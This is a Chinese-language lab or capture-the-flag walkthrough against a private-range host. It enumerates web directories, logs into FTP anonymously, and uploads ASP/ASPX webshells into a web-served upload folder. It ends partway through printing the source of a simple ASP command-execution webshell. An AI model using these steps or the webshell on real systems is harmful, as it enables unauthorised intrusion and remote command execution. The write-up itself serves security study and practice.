gobuster dir -u http://10.10.10.116 -w /usr/share/wordlists/dirb/big.txt -x asp,aspx
访问目录/upload,但是并没有在其中发现什么东西
21端口
通过匿名登录漏洞可登陆 ftp,但是搜索后并没有发现可疑文件或目录
ftp 10.10.10.116
# 账号密码:anonymous/anonymous
ftp > ls
文件上传
尝试在 ftp 目录下上传aspx类型的木马
ftp > put /usr/share/webshells/aspx/cmdasp.aspx cmdasp.aspx
在网站目录upload中出现cmdasp.aspx,说明通过 ftp 可将文件上传至网页端
但是访问后出现404,可能上传的木马存在问题,于是使用asp类型的木马
ftp > put /usr/share/webshells/asp/cmdasp.asp cmdasp.asp
访问还是存在问题,可能是因为服务端对执行函数进行了检查,于是上传下面这个简单的木马
<!--
ASP Webshell
Working on latest IIS
Referance :-
https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.asp
http://stackoverflow.com/questions/11501044/i-need-execute-a-c
ommand-line-in-a-visual-basic-script
http://www.w3schools.com/asp/
-->
<%
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
Function getCommandOutput(theCommand)
Dim objShell, objCmdExec
Set objShell = CreateObject("WScript.Shell")
Set objCmdExec = objshell.exec(thecommand)
getCommandOutput = objCmdExec.StdOut.ReadAll
end Function
%>